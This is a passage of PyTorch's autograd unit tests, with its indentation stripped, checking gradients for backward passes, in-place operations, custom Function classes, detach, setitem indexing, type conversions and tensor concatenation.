c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
